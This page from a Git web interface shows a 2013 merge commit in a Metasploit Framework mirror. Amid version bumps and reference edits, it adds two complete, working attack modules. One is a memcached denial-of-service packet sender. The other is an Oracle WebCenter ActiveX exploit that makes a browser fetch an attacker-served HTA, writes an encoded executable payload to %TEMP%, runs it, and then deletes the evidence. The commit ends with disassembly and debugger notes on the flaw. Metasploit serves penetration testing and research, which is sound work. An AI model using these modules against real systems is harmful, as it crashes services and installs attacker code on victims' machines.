infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/rapid7/metasploit-framework

bug/bundler_fix
jvazquez-r7 2013-06-03 15:27:36 -05:00
parent f68d35f251 055e0a222c
commit 4079484968
14 changed files with 346 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
Gemfile
View File

@ -15,7 +15,7 @@ group :db do
# Needed for Msf::DbManager
gem 'activerecord'
# Database models shared between framework and Pro.
gem 'metasploit_data_models', '~> 0.15.1'
gem 'metasploit_data_models', '~> 0.15.2'
# Needed for module caching in Mdm::ModuleDetails
gem 'pg', '>= 0.11'
end

4
Gemfile.lock
View File

@ -23,7 +23,7 @@ GEM
i18n (0.6.1)
json (1.7.7)
metaclass (0.0.1)
metasploit_data_models (0.15.1)
metasploit_data_models (0.15.2)
activerecord (>= 3.2.13)
activesupport
pg
@ -65,7 +65,7 @@ DEPENDENCIES
database_cleaner
factory_girl (>= 4.1.0)
json
metasploit_data_models (~> 0.15.1)
metasploit_data_models (~> 0.15.2)
msgpack
nokogiri
pcaprub

68
modules/auxiliary/dos/misc/memcached.rb Normal file
View File

@ -0,0 +1,68 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Memcached Remote Denial of Service',
'Description' => %q{
This module sends a specially-crafted packet to cause a
segmentation fault in memcached v1.4.15 or earlier versions.
},
'References' =>
[
[ 'URL', 'https://code.google.com/p/memcached/issues/detail?id=192' ],
[ 'CVE', '2011-4971' ],
[ 'OSVDB', '92867' ]
],
'Author' => [ 'Gregory Man <man.gregory[at]gmail.com>' ],
'License' => MSF_LICENSE
))
register_options([Opt::RPORT(11211),], self.class)
end
def is_alive?
begin
connect
disconnect
rescue Rex::ConnectionRefused
return false
end
return true
end
def run
connect
pkt = "\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff\xe8\x00\x00\x00\x00"
pkt << "\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00"
pkt << "\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
pkt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
print_status("#{rhost}:#{rport} - Sending dos packet...")
sock.put(pkt)
disconnect
print_status("#{rhost}:#{rport} - Checking host status...")
select(nil, nil, nil, 1)
if is_alive?
print_error("#{rhost}:#{rport} - The DoS attempt did not work, host is still alive")
else
print_good("#{rhost}:#{rport} - Tango down") # WWJS - What would th3j35t3r say?
end
end
end

2
modules/auxiliary/scanner/couchdb/couchdb_login.rb
View File

@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
super(update_info(info,
'Name' => 'CouchDB Login Utility',
'Description' => %{
This module will test CouchDB logins on a range of
This module tests CouchDB logins on a range of
machines and report successful logins.
},
'Author' =>

2
modules/auxiliary/scanner/http/svn_scanner.rb
View File

@ -117,7 +117,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("[#{target_host}] NOT Found. #{tpath} #{res.code}")
end
else
print_status("[#{target_host}] SVN Entries file found.")
print_good("[#{target_host}:#{rport}] SVN Entries file found.")
report_web_vuln(
:host => target_host,

1
modules/exploits/linux/http/esva_exec.rb
View File

@ -29,6 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
[ 'OSVDB', '85462'],
[ 'BID', '55050'],
[ 'EDB', '20551' ]
],

1
modules/exploits/linux/http/mutiny_frontend_upload.rb
View File

@ -35,6 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote
'References' =>
[
[ 'CVE', '2013-0136' ],
[ 'OSVDB', '93444' ],
[ 'US-CERT-VU', '701572' ],
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/05/15/new-1day-exploits-mutiny-vulnerabilities' ]
],

1
modules/exploits/linux/http/symantec_web_gateway_exec.rb
View File

@ -30,6 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
'References' =>
[
[ 'CVE', '2012-0297' ],
[ 'OSVDB', '82925' ],
[ 'BID', '53444' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-090' ],
[ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00' ]

1
modules/exploits/linux/http/vcms_upload.rb
View File

@ -36,6 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote
'References' =>
[
['CVE', '2011-4828'],
['OSVDB', '77183'],
['BID', '50706'],
['URL', 'http://bugs.v-cms.org/view.php?id=53'],
['URL', 'http://xforce.iss.net/xforce/xfdb/71358']

1
modules/exploits/linux/local/kloxo_lxsuexec.rb
View File

@ -46,6 +46,7 @@ class Metasploit4 < Msf::Exploit::Local
'References' =>
[
[ 'EDB', '25406' ],
[ 'OSVDB', '93287' ],
[ 'URL', 'http://roothackers.net/showthread.php?tid=92' ] # post referencing the vulnerability and PoC
],
'Targets' =>

1
modules/exploits/linux/local/sock_sendpage.rb
View File

@ -62,6 +62,7 @@ class Metasploit4 < Msf::Exploit::Local
'References' =>
[
[ 'CVE', '2009-2692' ],
[ 'OSVDB', '56992' ],
[ 'URL', 'http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html' ],
[ 'URL', 'http://www.grsecurity.net/~spender/wunderbar_emporium2.tgz' ],
],

8
modules/exploits/multi/http/struts_include_params.rb
View File

@ -21,10 +21,10 @@ class Metasploit3 < Msf::Exploit::Remote
This module exploits a remote command execution vulnerability in Apache Struts
versions < 2.3.14.2. A specifically crafted request parameter can be used to inject
arbitrary OGNL code into the stack bypassing Struts and OGNL library protections.
When targeting an action which requires interaction through GET the payload should
be split having into account the uri limits. In this case, if the rendered jsp has
more than one point of injection, it could result in payload corruption. It should
happen only when the payload is larger than the uri length.
When targeting an action which requires interaction through GET, the payload should
be split, taking into account the URI limits. In this case, if the rendered JSP has
more than one point of injection, it could result in payload corruption. This should
happen only when the payload is larger than the URI length.
},
'Author' =>
[

262
modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb Normal file
View File

@ -0,0 +1,262 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
def initialize(info={})
super(update_info(info,
'Name' => "Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution",
'Description' => %q{
This modules exploits a vulnerability found in the Oracle WebCenter Content
CheckOutAndOpenControl ActiveX. This vulnerability exists in openWebdav(), where
user controlled input is used to call ShellExecuteExW(). This module abuses the
control to execute an arbitrary HTA from a remote location. This module has been
tested successfully with the CheckOutAndOpenControl ActiveX installed with Oracle
WebCenter Content 11.1.1.6.0.
},
'License' => MSF_LICENSE,
'Author' =>
[
'rgod <rgod[at]autistici.org>', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2013-1559' ],
[ 'OSVDB', '92386' ],
[ 'BID', '59122' ],
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/cpuapr2013-1899555.html' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-094/' ]
],
'Payload' =>
{
'Space' => 2048,
'StackAdjustment' => -3500
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f -k'
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ]
],
'Privileged' => false,
'DisclosureDate' => "Apr 16 2013",
'DefaultTarget' => 0))
end
def exploit
@var_exename = rand_text_alpha(5 + rand(5)) + ".exe"
@dropped_files = [
@var_exename
]
super
end
def on_new_session(session)
if session.type == "meterpreter"
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
end
@dropped_files.delete_if do |file|
win_file = file.gsub("/", "\\\\")
if session.type == "meterpreter"
begin
wintemp = session.fs.file.expand_path("%TEMP%")
win_file = "#{wintemp}\\#{win_file}"
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
session.fs.file.rm(win_file)
print_good("Deleted #{file}")
true
rescue ::Rex::Post::Meterpreter::RequestError
print_error("Failed to delete #{win_file}")
false
end
end
end
end
def build_hta(cli)
var_shellobj = rand_text_alpha(rand(5)+5);
var_fsobj = rand_text_alpha(rand(5)+5);
var_fsobj_file = rand_text_alpha(rand(5)+5);
var_vbsname = rand_text_alpha(rand(5)+5);
var_writedir = rand_text_alpha(rand(5)+5);
var_origLoc = rand_text_alpha(rand(5)+5);
var_byteArray = rand_text_alpha(rand(5)+5);
var_writestream = rand_text_alpha(rand(5)+5);
var_strmConv = rand_text_alpha(rand(5)+5);
p = regenerate_payload(cli);
exe = generate_payload_exe({ :code => p.encoded })
# Doing in this way to bypass the ADODB.Stream restrictions on JS,
# even when executing it as an "HTA" application
# The encoding code has been stolen from ie_unsafe_scripting.rb
print_status("Encoding payload into vbs/javascript/hta...");
# Build the content that will end up in the .vbs file
vbs_content = Rex::Text.to_hex(%Q|
Dim #{var_origLoc}, s, #{var_byteArray}
#{var_origLoc} = SetLocale(1033)
|)
# Drop the exe payload into an ansi string (ansi ensured via SetLocale above)
# for conversion with ADODB.Stream
vbs_ary = []
# The output of this loop needs to be as small as possible since it
# gets repeated for every byte of the executable, ballooning it by a
# factor of about 80k (the current size of the exe template). In its
# current form, it's down to about 4MB on the wire
exe.each_byte do |b|
vbs_ary << Rex::Text.to_hex("s=s&Chr(#{("%d" % b)})\n")
end
vbs_content << vbs_ary.join("")
# Continue with the rest of the vbs file;
# Use ADODB.Stream to convert from an ansi string to it's byteArray equivalent
# Then use ADODB.Stream again to write the binary to file.
#print_status("Finishing vbs...");
vbs_content << Rex::Text.to_hex(%Q|
Dim #{var_strmConv}, #{var_writedir}, #{var_writestream}
#{var_writedir} = WScript.CreateObject("WScript.Shell").ExpandEnvironmentStrings("%TEMP%") & "\\#{@var_exename}"
Set #{var_strmConv} = CreateObject("ADODB.Stream")
#{var_strmConv}.Type = 2
#{var_strmConv}.Charset = "x-ansi"
#{var_strmConv}.Open
#{var_strmConv}.WriteText s, 0
#{var_strmConv}.Position = 0
#{var_strmConv}.Type = 1
#{var_strmConv}.SaveToFile #{var_writedir}, 2
SetLocale(#{var_origLoc})|)
hta = <<-EOS
<script>
var #{var_shellobj} = new ActiveXObject("WScript.Shell");
var #{var_fsobj} = new ActiveXObject("Scripting.FileSystemObject");
var #{var_writedir} = #{var_shellobj}.ExpandEnvironmentStrings("%TEMP%");
var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs",2,true);
#{var_fsobj_file}.Write(unescape("#{vbs_content}"));
#{var_fsobj_file}.Close();
#{var_shellobj}.run("wscript.exe " + #{var_writedir} + "\\\\" + "#{var_vbsname}.vbs", 1, true);
#{var_shellobj}.run(#{var_writedir} + "\\\\" + "#{@var_exename}", 0, false);
#{var_fsobj}.DeleteFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs");
window.close();
</script>
EOS
return hta
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
if agent !~ /MSIE \d/
print_error("Browser not supported: #{agent.to_s}")
send_not_found(cli)
return
end
print_status("Request received for #{request.uri}");
if request.uri =~ /\.hta$/
hta = build_hta(cli)
print_status("Sending HTA application")
send_response(cli, hta, {'Content-Type'=>'application/hta'})
return
end
uri = "#{get_uri}#{rand_text_alpha(rand(3) + 3)}.hta"
html = <<-EOS
<html>
<body>
<object id="target" width="100%" height="100%" classid="clsid:A200D7A4-CA91-4165-9885-AB618A39B3F0"></object>
<script>
target.openWebdav("#{uri}");
</script>
</body>
</html>
EOS
print_status("Sending HTML")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
end
=begin
* The vulnerable control tries to solve how to open the provided extension
.text:100099FC lea eax, [ebp+830h+Src]
.text:10009A02 push eax ; lpResult
.text:10009A03 lea eax, [ebp+830h+Directory]
.text:10009A06 push eax ; lpDirectory
.text:10009A07 lea eax, [ebp+830h+PathName]
.text:10009A0D push eax ; lpFile
.text:10009A0E call ds:FindExecutableW ; This function returns the executable associated with the specified file for the default verb
* If succeeds, the provided user data is used as argument:
.text:10009D8F lea eax, [ebp+psz]
.text:10009D95 mov [ebp+pExecInfo.lpFile], eax
.text:10009D9B mov eax, [ebp+var_238]
.text:10009DA1 mov [ebp+pExecInfo.cbSize], 3Ch
.text:10009DAB mov [ebp+pExecInfo.fMask], 2000000h
.text:10009DB5 mov [ebp+pExecInfo.hwnd], ebx
.text:10009DBB mov [ebp+pExecInfo.lpVerb], offset aOpen ; "open"
.text:10009DC5 jnb short loc_10009DCD
.text:10009DC7 lea eax, [ebp+var_238]
.text:10009DCD
.text:10009DCD loc_10009DCD: ; CODE XREF: make_ShellExecute_sub_10009ACC+2F9j
.text:10009DCD mov [ebp+pExecInfo.lpParameters], eax
.text:10009DD3 lea eax, [ebp+pExecInfo]
.text:10009DD9 push eax ; pExecInfo
.text:10009DDA mov [ebp+pExecInfo.lpDirectory], ebx
.text:10009DE0 mov [ebp+pExecInfo.nShow], 0Ah
.text:10009DEA call ds:ShellExecuteExW
* On the debugger:
Breakpoint 1 hit
eax=0201ef6c ebx=00000000 ecx=00000000 edx=03850608 esi=00000008 edi=00000000
eip=10009dea esp=0201ee08 ebp=0201f200 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212
CheckOutAndOpen!DllUnregisterServer+0x7108:
10009dea ff156cd20210 call dword ptr [CheckOutAndOpen!DllUnregisterServer+0x2a58a (1002d26c)] ds:0023:1002d26c={SHELL32!ShellExecuteExW (7ca02f03)}
0:007> dd esp
0201ee08 0201ef6c <== pExecInfo
0:007> dd 0201ef6c
0201ef6c 0000003c 02000000 00000000 10031468
0201ef7c 0201efe0 03854688
0:007> du 0201efe0
0201efe0 "C:\WINDOWS\system32\mshta.exe"
0:007> du 03854688
03854688 ""http://192.168.172.1:8080/xKRTv"
038546c8 "m0mqpAt7sEYdVq.hta""
This code allows to launch other executables with user data provided as argument, but at the moment I like the HTA
solution because it allows to pass URL's as arguments. And code executed by mshta is on a privileged zone. Other
executables allow to provide SMB URI's but metasploit only allow to 'simulate' a SMB resource through webdav, so
the target should have the WebClient service enabled, which is only enabled by default on XP SP3.
=end

2
modules/exploits/windows/misc/lianja_db_net.rb
View File

@ -16,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'Lianja SQL 1.0.0RC5.1 db_netserver Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the db_netserver process which
This module exploits a stack buffer overflow in the db_netserver process, which
is spawned by the Lianja SQL server. The issue is fixed in Lianja SQL 1.0.0RC5.2.
},
'Author' => 'Spencer McIntyre',